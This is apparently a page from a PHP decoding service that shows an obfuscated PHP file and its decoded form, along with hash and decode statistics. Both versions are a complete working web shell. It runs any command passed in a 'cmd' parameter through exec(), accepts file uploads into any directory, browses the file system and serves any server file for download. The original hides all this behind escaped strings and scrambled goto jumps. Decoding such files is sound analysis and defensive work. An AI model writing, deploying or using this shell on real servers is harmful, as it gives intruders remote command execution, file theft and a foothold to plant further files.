Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!isset($_GET["\x64\157\x77\x6e\x6c\157\141\x64"])) { goto lDYuBAu; } $lCgBgA = ..

Decoded Output download

<?php 
if (!isset($_GET["download"])) { goto lDYuBAu; } $lCgBgA = $_GET["download"]; if (!file_exists($lCgBgA)) { goto lDYuBAA; } header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($lCgBgA) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($lCgBgA)); readfile($lCgBgA); exit; lDYuBAA: lDYuBAu: echo "
\xa<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

\xa<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
\xd
<div class="container">


\xa"; function printPerms($lCgBgA) { goto lDYuBuR; lDYuBux: $lCgBgB = "u"; goto lDYuBuO; lDYuBuI: $lCgBgB = "s"; goto lDYuBuC; lDYuBBA: goto lDYuBAj; goto lDYuBBu; lDYuBgj: $lCgBgg["execute"] = $lCgBgg["execute"] == "x" ? "s" : "S"; goto lDYuBgt; lDYuBgt: lDYuBuu: goto lDYuBgD; lDYuBBR: lDYuBAj: goto lDYuBBg; lDYuBgB: $lCgBgR["execute"] = $lCgBgR["execute"] == "x" ? "s" : "S"; goto lDYuBgR; lDYuBBO: goto lDYuBAx; goto lDYuBBE; lDYuBuC: lDYuBAR: goto lDYuBBA; lDYuBBE: lDYuBAY: goto lDYuBBI; lDYuBuR: $lCgBgu = fileperms($lCgBgA); goto lDYuBug; lDYuBuO: goto lDYuBAR; goto lDYuBuE; lDYuBBB: $lCgBgB = "l"; goto lDYuBBR; lDYuBBw: goto lDYuBAH; goto lDYuBBH; lDYuBRA: goto lDYuBAE; goto lDYuBRu; lDYuBgD: if (!($lCgBgu & 0x200)) { goto lDYuBuB; } goto lDYuBgw; lDYuBRO: $lCgBgg["write"] = $lCgBgu & 020 ? "w" : "-"; goto lDYuBRE; lDYuBRx: $lCgBgg["read"] = $lCgBgu & 040 ? "r" : "-"; goto lDYuBRO; lDYuBgg: if (!($lCgBgu & 0x400)) { goto lDYuBuu; } goto lDYuBgj; lDYuBRj: lDYuBAI: goto lDYuBRt; lDYuBgH: lDYuBuB: goto lDYuBgY; lDYuBBt: $lCgBgB = "-"; goto lDYuBBD; lDYuBRY: $lCgBgR["execute"] = $lCgBgu & 0100 ? "x" : "-"; goto lDYuBRx; lDYuBBg: goto lDYuBAD; goto lDYuBBj; lDYuBRI: $lCgBgj["read"] = $lCgBgu & 04 ? "r" : "-"; goto lDYuBRC; lDYuBRg: goto lDYuBAC; goto lDYuBRj; lDYuBBu: lDYuBAg: goto lDYuBBB; lDYuBgu: if (!($lCgBgu & 0x800)) { goto lDYuBuA; } goto lDYuBgB; lDYuBuE: lDYuBAB: goto lDYuBuI; lDYuBgO: $lCgBgt .= sprintf("%1s%1s%1s", $lCgBgg["read"], $lCgBgg["write"], $lCgBgg["execute"]); goto lDYuBgE; lDYuBuY: if ($lCgBgu & 0xc000) { goto lDYuBAB; } goto lDYuBux; lDYuBgw: $lCgBgj["execute"] = $lCgBgj["execute"] == "x" ? "t" : "T"; goto lDYuBgH; lDYuBgx: $lCgBgt .= sprintf("%1s%1s%1s", $lCgBgR["read"], $lCgBgR["write"], $lCgBgR["execute"]); goto lDYuBgO; lDYuBuH: if ($lCgBgu & 0xa000) { goto lDYuBAg; } goto lDYuBuY; lDYuBgE: $lCgBgt .= sprintf("%1s%1s%1s", $lCgBgj["read"], $lCgBgj["write"], $lCgBgj["execute"]); goto lDYuBgI; lDYuBgI: return $lCgBgt; goto lDYuBgC; lDYuBBx: lDYuBAH: goto lDYuBBO; lDYuBRu: lDYuBAO: goto lDYuBRB; lDYuBRw: $lCgBgR["read"] = $lCgBgu & 0400 ? "r" : "-"; goto lDYuBRH; lDYuBut: if ($lCgBgu & 0x4000) { goto lDYuBAY; } goto lDYuBuD; lDYuBBD: lDYuBAD: goto lDYuBBw; lDYuBuj: if ($lCgBgu & 0x2000) { goto lDYuBAO; } goto lDYuBut; lDYuBRB: $lCgBgB = "c"; goto lDYuBRR; lDYuBBC: lDYuBAx: goto lDYuBRA; lDYuBBH: lDYuBAw: goto lDYuBBY; lDYuBBI: $lCgBgB = "d"; goto lDYuBBC; lDYuBBj: lDYuBAt: goto lDYuBBt; lDYuBgY: $lCgBgt = sprintf("%1s", $lCgBgB); goto lDYuBgx; lDYuBRt: $lCgBgB = "p"; goto lDYuBRD; lDYuBRE: $lCgBgg["execute"] = $lCgBgu & 010 ? "x" : "-"; goto lDYuBRI; lDYuBgR: lDYuBuA: goto lDYuBgg; lDYuBBY: $lCgBgB = "b"; goto lDYuBBx; lDYuBgA: $lCgBgj["execute"] = $lCgBgu & 01 ? "x" : "-"; goto lDYuBgu; lDYuBuD: if ($lCgBgu & 0x6000) { goto lDYuBAw; } goto lDYuBuw; lDYuBug: if ($lCgBgu & 0x1000) { goto lDYuBAI; } goto lDYuBuj; lDYuBRC: $lCgBgj["write"] = $lCgBgu & 02 ? "w" : "-"; goto lDYuBgA; lDYuBRR: lDYuBAE: goto lDYuBRg; lDYuBRD: lDYuBAC: goto lDYuBRw; lDYuBuw: if ($lCgBgu & 0x8000) { goto lDYuBAt; } goto lDYuBuH; lDYuBRH: $lCgBgR["write"] = $lCgBgu & 0200 ? "w" : "-"; goto lDYuBRY; lDYuBgC: } $lCgBgD = $_GET["dir"]; if (!isset($_POST["dir"])) { goto lDYuBjA; } $lCgBgD = $_POST["dir"]; lDYuBjA: $lCgBgA = ''; if (!($lCgBgD == NULL or !is_dir($lCgBgD))) { goto lDYuBjB; } if (!is_file($lCgBgD)) { goto lDYuBju; } echo "enters"; $lCgBgA = $lCgBgD; echo $lCgBgA; lDYuBju: $lCgBgD = "./"; lDYuBjB: $lCgBgD = realpath($lCgBgD . "/" . $lCgBgw); $lCgBgH = scandir($lCgBgD); echo "<h2>Viewing directory " . $lCgBgD . "</h2>"; echo "
<br><form action='" . $_SERVER["PHP_SELF"] . "' method='GET'>"; echo "<input type='hidden' name='dir' value=" . $lCgBgD . " />"; echo "<input type='text' name='cmd' autocomplete='off' autofocus>
<input type='submit' value='Execute'>
"; echo "</form>"; echo "
<br>\xa<div class='navbar-form'><form action='" . $_SERVER["PHP_SELF"] . "' method='POST' enctype='multipart/form-data'>
"; echo "<input type='hidden' name='dir' value='" . $_GET["dir"] . "'/> "; echo "<input type='file' name='fileToUpload' id='fileToUpload'>
<br><input type='submit' value='Upload File' name='submit'>"; echo "</div>"; if (!isset($_POST["submit"])) { goto lDYuBjD; } $lCgBgY = $lCgBgD . "/" . basename($_FILES["fileToUpload"]["name"]); if (file_exists($lCgBgY)) { goto lDYuBjj; } if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $lCgBgY)) { goto lDYuBjR; } echo "<br><br><b style="color:red">Error uploading file " . $lCgBgY . "</b><br><br>"; goto lDYuBjg; lDYuBjR: echo "<br><br><b>File " . $_FILES["fileToUpload"]["name"] . " uploaded successfully in " . $lCgBgD . " !</b><br>"; lDYuBjg: goto lDYuBjt; lDYuBjj: echo "<br><br><b style='color:red'>Error. File already exists in " . $lCgBgY . ".</b></br></br>"; lDYuBjt: lDYuBjD: if (!isset($_GET["cmd"])) { goto lDYuBjY; } echo "<br><br><b>Result of command execution: </b><br>"; exec("cd " . $lCgBgD . " && " . $_GET["cmd"], $lCgBgx); foreach ($lCgBgx as $lCgBgO => $lCgBgw) { echo "{$lCgBgw} 
<br>"; } lDYuBjY: echo "<br>"; echo "
\xa<table class="table table-hover table-bordered">\xd
    <thead>
      <tr>
\xa        <th>Name</th>\xd\xa        <th>Owner</th>
\xa        <th>Permissions</th>
\xa      </tr>\xd
    </thead>
\xa    <tbody>
"; foreach ($lCgBgH as $lCgBgO => $lCgBgw) { goto lDYuBjC; lDYuBtj: lDYuBjI: goto lDYuBtt; lDYuBtt: echo "</tr>"; goto lDYuBtD; lDYuBtB: goto lDYuBjI; goto lDYuBtR; lDYuBtg: echo "<td><a href='" . $_SERVER["PHP_SELF"] . "?dir=" . realpath($lCgBgD . "/" . $lCgBgw) . "/'>" . $lCgBgw . "</a></td><td>" . posix_getpwuid(fileowner($lCgBgD . "/" . $lCgBgw))[name] . "</td><td> " . printPerms($lCgBgD) . "</td>\xa"; goto lDYuBtj; lDYuBtR: lDYuBjE: goto lDYuBtg; lDYuBtu: echo "<td><a href='" . $_SERVER["PHP_SELF"] . "?download=" . realpath($lCgBgD . "/" . $lCgBgw) . "'>" . $lCgBgw . "</a></td><td>" . posix_getpwuid(fileowner($lCgBgD . "/" . $lCgBgw))[name] . "</td><td> " . printPerms($lCgBgD) . "</td>\xa"; goto lDYuBtB; lDYuBtA: if (is_dir(realpath($lCgBgD . "/" . $lCgBgw))) { goto lDYuBjE; } goto lDYuBtu; lDYuBjC: echo "<tr>"; goto lDYuBtA; lDYuBtD: } echo "</tbody>"; echo "</table>"; echo "\xd
\xd
\xd
</div>\xd\xa</html>"; 
 ?>

Did this file decode correctly?

Original Code

<?php
if (!isset($_GET["\x64\157\x77\x6e\x6c\157\141\x64"])) { goto lDYuBAu; } $lCgBgA = $_GET["\144\157\167\156\x6c\x6f\141\x64"]; if (!file_exists($lCgBgA)) { goto lDYuBAA; } header("\103\157\x6e\x74\145\x6e\164\x2d\x44\145\x73\143\162\x69\x70\164\x69\157\156\72\40\106\151\154\x65\x20\x54\162\141\156\x73\146\x65\162"); header("\x43\157\156\164\145\x6e\164\55\124\x79\160\145\x3a\40\x61\160\160\154\x69\x63\141\164\x69\157\156\x2f\157\x63\164\x65\164\x2d\x73\x74\162\145\141\x6d"); header("\x43\157\156\x74\x65\156\164\x2d\104\x69\x73\160\x6f\163\151\x74\151\x6f\156\x3a\40\x61\x74\x74\141\143\150\x6d\x65\156\x74\x3b\40\146\x69\154\145\156\x61\x6d\x65\x3d\x22" . basename($lCgBgA) . "\42"); header("\105\170\160\x69\x72\145\163\x3a\x20\60"); header("\x43\141\x63\x68\145\x2d\x43\157\x6e\x74\x72\157\x6c\72\x20\155\x75\x73\x74\55\162\x65\x76\141\x6c\x69\144\141\x74\145"); header("\x50\x72\x61\x67\155\x61\x3a\40\x70\x75\x62\x6c\151\143"); header("\103\157\156\164\x65\x6e\x74\55\x4c\145\x6e\x67\164\150\72\40" . filesize($lCgBgA)); readfile($lCgBgA); exit; lDYuBAA: lDYuBAu: echo "\15\xa\x3c\150\x74\155\x6c\x3e\15\12\x3c\41\x2d\x2d\x20\114\141\x74\145\x73\x74\x20\x63\x6f\155\x70\151\x6c\x65\144\40\141\x6e\x64\40\155\x69\156\x69\x66\x69\x65\x64\x20\x43\123\x53\x20\x2d\55\x3e\15\12\74\x6c\x69\156\x6b\x20\x72\x65\154\75\42\163\164\171\x6c\x65\163\x68\145\x65\x74\x22\40\150\162\145\146\x3d\42\x68\164\164\x70\x3a\x2f\57\155\x61\170\x63\x64\156\x2e\142\157\157\x74\163\164\x72\x61\160\x63\144\156\56\143\x6f\155\x2f\x62\x6f\157\x74\163\164\162\141\x70\57\63\56\x33\56\66\x2f\143\x73\163\57\142\x6f\x6f\x74\x73\x74\x72\x61\x70\56\155\x69\156\56\x63\x73\163\x22\76\15\12\15\12\74\x21\55\55\40\152\x51\165\x65\162\171\40\154\x69\x62\162\x61\x72\x79\40\55\55\x3e\15\12\74\x73\x63\162\x69\x70\164\40\163\162\143\75\x22\x68\164\164\x70\163\x3a\x2f\x2f\x61\x6a\x61\x78\x2e\147\x6f\x6f\147\154\x65\x61\x70\x69\163\x2e\x63\x6f\155\x2f\141\x6a\x61\170\x2f\x6c\x69\x62\x73\57\x6a\161\x75\145\162\171\57\x31\56\x31\x32\x2e\x32\57\x6a\x71\165\145\162\171\x2e\155\151\x6e\56\x6a\163\42\x3e\x3c\x2f\x73\143\162\x69\x70\x74\76\15\12\15\xa\74\41\x2d\55\x20\x4c\141\x74\x65\163\x74\x20\x63\157\155\x70\x69\154\x65\144\40\112\x61\166\141\123\143\x72\x69\160\x74\x20\x2d\55\x3e\15\12\74\163\x63\x72\x69\x70\164\40\x73\162\x63\75\42\150\164\164\x70\72\57\x2f\155\x61\x78\143\x64\156\56\142\157\157\164\163\164\x72\x61\160\143\x64\156\x2e\143\x6f\x6d\x2f\142\157\157\164\163\164\x72\141\160\x2f\63\x2e\63\56\66\x2f\x6a\x73\57\x62\157\x6f\164\163\x74\162\x61\x70\56\155\151\156\x2e\152\163\42\76\x3c\x2f\x73\x63\162\151\x70\x74\76\15\12\xd\12\x3c\x64\151\166\x20\x63\x6c\x61\163\x73\75\x22\143\x6f\x6e\164\141\x69\156\145\x72\x22\x3e\15\12\15\12\15\xa"; function printPerms($lCgBgA) { goto lDYuBuR; lDYuBux: $lCgBgB = "\x75"; goto lDYuBuO; lDYuBuI: $lCgBgB = "\x73"; goto lDYuBuC; lDYuBBA: goto lDYuBAj; goto lDYuBBu; lDYuBgj: $lCgBgg["\145\x78\x65\143\165\164\x65"] = $lCgBgg["\145\x78\x65\x63\165\x74\145"] == "\170" ? "\163" : "\x53"; goto lDYuBgt; lDYuBgt: lDYuBuu: goto lDYuBgD; lDYuBBR: lDYuBAj: goto lDYuBBg; lDYuBgB: $lCgBgR["\145\170\x65\x63\165\x74\145"] = $lCgBgR["\x65\x78\x65\x63\x75\164\x65"] == "\x78" ? "\x73" : "\123"; goto lDYuBgR; lDYuBBO: goto lDYuBAx; goto lDYuBBE; lDYuBuC: lDYuBAR: goto lDYuBBA; lDYuBBE: lDYuBAY: goto lDYuBBI; lDYuBuR: $lCgBgu = fileperms($lCgBgA); goto lDYuBug; lDYuBuO: goto lDYuBAR; goto lDYuBuE; lDYuBBB: $lCgBgB = "\x6c"; goto lDYuBBR; lDYuBBw: goto lDYuBAH; goto lDYuBBH; lDYuBRA: goto lDYuBAE; goto lDYuBRu; lDYuBgD: if (!($lCgBgu & 0x200)) { goto lDYuBuB; } goto lDYuBgw; lDYuBRO: $lCgBgg["\x77\162\151\x74\x65"] = $lCgBgu & 020 ? "\x77" : "\55"; goto lDYuBRE; lDYuBRx: $lCgBgg["\162\145\x61\x64"] = $lCgBgu & 040 ? "\x72" : "\55"; goto lDYuBRO; lDYuBgg: if (!($lCgBgu & 0x400)) { goto lDYuBuu; } goto lDYuBgj; lDYuBRj: lDYuBAI: goto lDYuBRt; lDYuBgH: lDYuBuB: goto lDYuBgY; lDYuBBt: $lCgBgB = "\55"; goto lDYuBBD; lDYuBRY: $lCgBgR["\145\170\x65\x63\165\x74\145"] = $lCgBgu & 0100 ? "\x78" : "\55"; goto lDYuBRx; lDYuBBg: goto lDYuBAD; goto lDYuBBj; lDYuBRI: $lCgBgj["\162\x65\x61\144"] = $lCgBgu & 04 ? "\162" : "\x2d"; goto lDYuBRC; lDYuBRg: goto lDYuBAC; goto lDYuBRj; lDYuBBu: lDYuBAg: goto lDYuBBB; lDYuBgu: if (!($lCgBgu & 0x800)) { goto lDYuBuA; } goto lDYuBgB; lDYuBuE: lDYuBAB: goto lDYuBuI; lDYuBgO: $lCgBgt .= sprintf("\45\61\x73\45\61\x73\x25\x31\163", $lCgBgg["\x72\145\141\x64"], $lCgBgg["\x77\162\x69\164\x65"], $lCgBgg["\145\170\145\143\x75\x74\x65"]); goto lDYuBgE; lDYuBuY: if ($lCgBgu & 0xc000) { goto lDYuBAB; } goto lDYuBux; lDYuBgw: $lCgBgj["\145\x78\x65\x63\x75\x74\x65"] = $lCgBgj["\145\x78\145\143\165\164\x65"] == "\x78" ? "\x74" : "\x54"; goto lDYuBgH; lDYuBgx: $lCgBgt .= sprintf("\x25\61\x73\45\61\163\x25\61\x73", $lCgBgR["\162\145\141\x64"], $lCgBgR["\167\x72\151\164\x65"], $lCgBgR["\145\x78\145\x63\x75\164\x65"]); goto lDYuBgO; lDYuBuH: if ($lCgBgu & 0xa000) { goto lDYuBAg; } goto lDYuBuY; lDYuBgE: $lCgBgt .= sprintf("\x25\61\x73\x25\61\163\x25\61\x73", $lCgBgj["\162\x65\141\x64"], $lCgBgj["\167\162\151\x74\145"], $lCgBgj["\x65\x78\x65\143\x75\x74\145"]); goto lDYuBgI; lDYuBgI: return $lCgBgt; goto lDYuBgC; lDYuBBx: lDYuBAH: goto lDYuBBO; lDYuBRu: lDYuBAO: goto lDYuBRB; lDYuBRw: $lCgBgR["\x72\x65\141\x64"] = $lCgBgu & 0400 ? "\x72" : "\x2d"; goto lDYuBRH; lDYuBut: if ($lCgBgu & 0x4000) { goto lDYuBAY; } goto lDYuBuD; lDYuBBD: lDYuBAD: goto lDYuBBw; lDYuBuj: if ($lCgBgu & 0x2000) { goto lDYuBAO; } goto lDYuBut; lDYuBRB: $lCgBgB = "\143"; goto lDYuBRR; lDYuBBC: lDYuBAx: goto lDYuBRA; lDYuBBH: lDYuBAw: goto lDYuBBY; lDYuBBI: $lCgBgB = "\x64"; goto lDYuBBC; lDYuBBj: lDYuBAt: goto lDYuBBt; lDYuBgY: $lCgBgt = sprintf("\45\61\x73", $lCgBgB); goto lDYuBgx; lDYuBRt: $lCgBgB = "\160"; goto lDYuBRD; lDYuBRE: $lCgBgg["\145\x78\145\x63\x75\x74\145"] = $lCgBgu & 010 ? "\170" : "\x2d"; goto lDYuBRI; lDYuBgR: lDYuBuA: goto lDYuBgg; lDYuBBY: $lCgBgB = "\x62"; goto lDYuBBx; lDYuBgA: $lCgBgj["\145\x78\145\143\165\164\145"] = $lCgBgu & 01 ? "\170" : "\x2d"; goto lDYuBgu; lDYuBuD: if ($lCgBgu & 0x6000) { goto lDYuBAw; } goto lDYuBuw; lDYuBug: if ($lCgBgu & 0x1000) { goto lDYuBAI; } goto lDYuBuj; lDYuBRC: $lCgBgj["\x77\x72\x69\x74\145"] = $lCgBgu & 02 ? "\x77" : "\55"; goto lDYuBgA; lDYuBRR: lDYuBAE: goto lDYuBRg; lDYuBRD: lDYuBAC: goto lDYuBRw; lDYuBuw: if ($lCgBgu & 0x8000) { goto lDYuBAt; } goto lDYuBuH; lDYuBRH: $lCgBgR["\167\162\x69\x74\145"] = $lCgBgu & 0200 ? "\167" : "\55"; goto lDYuBRY; lDYuBgC: } $lCgBgD = $_GET["\144\x69\x72"]; if (!isset($_POST["\x64\x69\x72"])) { goto lDYuBjA; } $lCgBgD = $_POST["\144\151\x72"]; lDYuBjA: $lCgBgA = ''; if (!($lCgBgD == NULL or !is_dir($lCgBgD))) { goto lDYuBjB; } if (!is_file($lCgBgD)) { goto lDYuBju; } echo "\145\x6e\164\145\x72\163"; $lCgBgA = $lCgBgD; echo $lCgBgA; lDYuBju: $lCgBgD = "\x2e\x2f"; lDYuBjB: $lCgBgD = realpath($lCgBgD . "\x2f" . $lCgBgw); $lCgBgH = scandir($lCgBgD); echo "\x3c\150\62\76\x56\151\x65\x77\151\156\x67\40\144\151\162\x65\x63\164\x6f\162\x79\40" . $lCgBgD . "\x3c\57\x68\62\76"; echo "\12\x3c\142\162\76\74\146\x6f\162\155\x20\x61\x63\x74\x69\x6f\156\75\47" . $_SERVER["\120\110\x50\137\123\x45\x4c\106"] . "\47\40\155\x65\164\150\157\144\75\47\x47\105\124\x27\76"; echo "\x3c\x69\156\160\165\164\x20\x74\171\x70\x65\x3d\47\x68\151\x64\144\145\156\47\40\156\x61\155\145\75\x27\x64\x69\162\47\40\x76\141\154\165\145\75" . $lCgBgD . "\40\57\76"; echo "\x3c\x69\156\x70\165\x74\x20\164\171\160\x65\75\47\x74\145\x78\x74\x27\x20\156\141\155\x65\x3d\47\x63\x6d\x64\x27\x20\x61\165\x74\x6f\x63\x6f\x6d\x70\x6c\x65\164\x65\x3d\x27\x6f\x66\146\x27\40\141\165\x74\x6f\x66\x6f\x63\x75\x73\x3e\12\74\x69\x6e\x70\165\164\40\x74\x79\x70\x65\75\x27\163\x75\142\x6d\151\x74\x27\40\166\x61\154\165\x65\75\47\x45\170\x65\143\x75\x74\x65\47\76\12"; echo "\x3c\57\x66\x6f\x72\x6d\x3e"; echo "\12\x3c\x62\x72\x3e\xa\74\x64\x69\166\x20\143\154\x61\163\x73\x3d\x27\x6e\x61\x76\x62\x61\x72\x2d\146\157\x72\x6d\x27\76\74\146\x6f\x72\x6d\40\141\x63\164\151\x6f\x6e\75\x27" . $_SERVER["\x50\110\120\137\x53\105\114\x46"] . "\47\40\x6d\145\164\x68\x6f\144\75\x27\x50\117\x53\x54\x27\x20\145\x6e\x63\164\171\x70\145\75\47\x6d\x75\x6c\x74\151\x70\x61\162\x74\57\146\x6f\162\x6d\x2d\144\x61\164\x61\x27\x3e\12"; echo "\74\151\156\x70\165\164\x20\164\171\x70\x65\75\x27\150\x69\x64\x64\x65\156\x27\x20\156\x61\155\145\75\47\144\x69\x72\47\40\166\141\x6c\165\x65\x3d\47" . $_GET["\144\x69\162"] . "\x27\x2f\76\x20"; echo "\x3c\x69\x6e\160\165\164\x20\164\x79\x70\x65\75\47\x66\x69\x6c\x65\x27\40\x6e\x61\155\x65\x3d\47\146\x69\x6c\x65\x54\x6f\x55\160\154\157\141\x64\x27\x20\x69\x64\x3d\47\146\151\154\145\x54\157\125\160\154\157\x61\x64\47\76\12\74\142\x72\x3e\74\151\156\x70\165\x74\40\164\171\x70\x65\75\47\x73\x75\x62\x6d\151\164\x27\40\166\x61\154\x75\x65\75\47\x55\x70\154\157\x61\144\40\106\x69\154\145\47\x20\156\141\x6d\145\75\x27\163\165\x62\155\x69\164\47\76"; echo "\74\57\144\x69\x76\76"; if (!isset($_POST["\163\165\x62\155\x69\x74"])) { goto lDYuBjD; } $lCgBgY = $lCgBgD . "\57" . basename($_FILES["\x66\x69\x6c\x65\124\x6f\125\x70\x6c\157\x61\x64"]["\156\x61\155\x65"]); if (file_exists($lCgBgY)) { goto lDYuBjj; } if (move_uploaded_file($_FILES["\x66\x69\154\145\124\157\x55\x70\154\157\141\144"]["\x74\155\160\137\156\x61\155\x65"], $lCgBgY)) { goto lDYuBjR; } echo "\x3c\142\x72\76\74\142\x72\x3e\x3c\x62\40\x73\164\171\x6c\x65\75\42\143\x6f\154\157\162\72\162\x65\x64\42\76\x45\x72\162\x6f\162\40\x75\x70\x6c\157\141\x64\x69\156\147\40\x66\151\154\145\x20" . $lCgBgY . "\74\x2f\x62\x3e\74\142\162\x3e\x3c\x62\x72\76"; goto lDYuBjg; lDYuBjR: echo "\x3c\142\x72\76\x3c\142\x72\x3e\74\142\x3e\x46\151\154\145\x20" . $_FILES["\x66\151\x6c\145\124\x6f\x55\x70\x6c\x6f\141\x64"]["\156\141\155\145"] . "\x20\165\x70\x6c\x6f\141\x64\145\144\x20\163\165\x63\x63\145\x73\x73\146\165\154\154\x79\x20\x69\x6e\40" . $lCgBgD . "\x20\41\x3c\57\x62\76\74\x62\162\76"; lDYuBjg: goto lDYuBjt; lDYuBjj: echo "\x3c\142\162\x3e\74\142\162\76\x3c\x62\x20\x73\x74\x79\154\145\75\x27\x63\157\x6c\157\x72\72\x72\145\x64\x27\76\105\162\162\x6f\162\56\40\x46\x69\x6c\145\x20\141\x6c\162\x65\x61\x64\171\40\x65\x78\x69\x73\x74\x73\x20\151\156\x20" . $lCgBgY . "\x2e\74\x2f\x62\76\74\57\142\x72\76\74\x2f\x62\x72\x3e"; lDYuBjt: lDYuBjD: if (!isset($_GET["\143\155\144"])) { goto lDYuBjY; } echo "\74\x62\162\x3e\74\142\x72\76\74\142\x3e\x52\145\x73\x75\x6c\164\40\157\x66\40\x63\x6f\x6d\x6d\141\156\144\40\x65\x78\x65\x63\165\164\151\x6f\156\x3a\40\x3c\x2f\x62\76\x3c\142\162\x3e"; exec("\x63\144\40" . $lCgBgD . "\40\x26\46\40" . $_GET["\143\x6d\x64"], $lCgBgx); foreach ($lCgBgx as $lCgBgO => $lCgBgw) { echo "{$lCgBgw}\40\12\74\x62\162\76"; } lDYuBjY: echo "\x3c\142\162\76"; echo "\15\xa\74\x74\141\x62\x6c\x65\40\x63\x6c\x61\x73\163\x3d\42\x74\x61\142\x6c\145\40\164\141\142\154\145\x2d\x68\157\166\145\162\40\x74\141\x62\x6c\x65\x2d\142\x6f\x72\x64\x65\x72\x65\144\x22\76\xd\12\40\x20\40\40\74\164\x68\145\141\x64\76\15\12\40\x20\40\x20\40\x20\74\164\162\x3e\15\xa\40\40\40\40\x20\x20\x20\40\x3c\164\x68\76\x4e\141\155\x65\x3c\57\x74\150\76\xd\xa\x20\x20\40\40\x20\40\x20\x20\x3c\164\150\x3e\x4f\167\x6e\x65\x72\x3c\57\164\x68\x3e\15\xa\40\40\x20\40\40\x20\40\40\74\164\150\x3e\120\x65\x72\x6d\x69\x73\163\151\x6f\x6e\x73\74\57\164\150\76\15\xa\x20\x20\x20\x20\40\x20\x3c\57\164\162\x3e\xd\12\40\40\40\40\74\x2f\164\x68\x65\x61\x64\x3e\15\xa\40\40\40\40\74\164\x62\x6f\x64\171\x3e\15\12"; foreach ($lCgBgH as $lCgBgO => $lCgBgw) { goto lDYuBjC; lDYuBtj: lDYuBjI: goto lDYuBtt; lDYuBtt: echo "\x3c\x2f\x74\x72\76"; goto lDYuBtD; lDYuBtB: goto lDYuBjI; goto lDYuBtR; lDYuBtg: echo "\x3c\x74\144\x3e\74\x61\40\150\x72\x65\146\x3d\47" . $_SERVER["\120\110\120\x5f\123\x45\x4c\x46"] . "\x3f\x64\151\x72\x3d" . realpath($lCgBgD . "\x2f" . $lCgBgw) . "\x2f\47\76" . $lCgBgw . "\74\x2f\x61\x3e\x3c\57\164\x64\76\74\x74\144\x3e" . posix_getpwuid(fileowner($lCgBgD . "\x2f" . $lCgBgw))[name] . "\74\x2f\x74\144\x3e\74\x74\x64\76\40" . printPerms($lCgBgD) . "\x3c\57\164\x64\76\xa"; goto lDYuBtj; lDYuBtR: lDYuBjE: goto lDYuBtg; lDYuBtu: echo "\74\164\x64\x3e\74\x61\x20\x68\x72\145\x66\x3d\x27" . $_SERVER["\120\110\x50\x5f\123\105\114\x46"] . "\x3f\144\x6f\167\x6e\154\157\141\x64\75" . realpath($lCgBgD . "\x2f" . $lCgBgw) . "\47\x3e" . $lCgBgw . "\74\x2f\141\76\74\57\164\144\76\x3c\x74\144\x3e" . posix_getpwuid(fileowner($lCgBgD . "\57" . $lCgBgw))[name] . "\x3c\57\164\144\76\x3c\164\x64\x3e\x20" . printPerms($lCgBgD) . "\x3c\x2f\x74\144\76\xa"; goto lDYuBtB; lDYuBtA: if (is_dir(realpath($lCgBgD . "\57" . $lCgBgw))) { goto lDYuBjE; } goto lDYuBtu; lDYuBjC: echo "\x3c\164\x72\x3e"; goto lDYuBtA; lDYuBtD: } echo "\74\x2f\164\x62\157\x64\x79\x3e"; echo "\x3c\x2f\x74\141\x62\154\145\x3e"; echo "\xd\12\xd\12\xd\12\x3c\57\144\x69\166\x3e\xd\xa\74\57\150\164\155\x6c\76";

Function Calls

None

Variables

None

Stats

MD5 622e4f60ed49c70c30c9c823d5217242
Eval Count 0
Decode Time 64 ms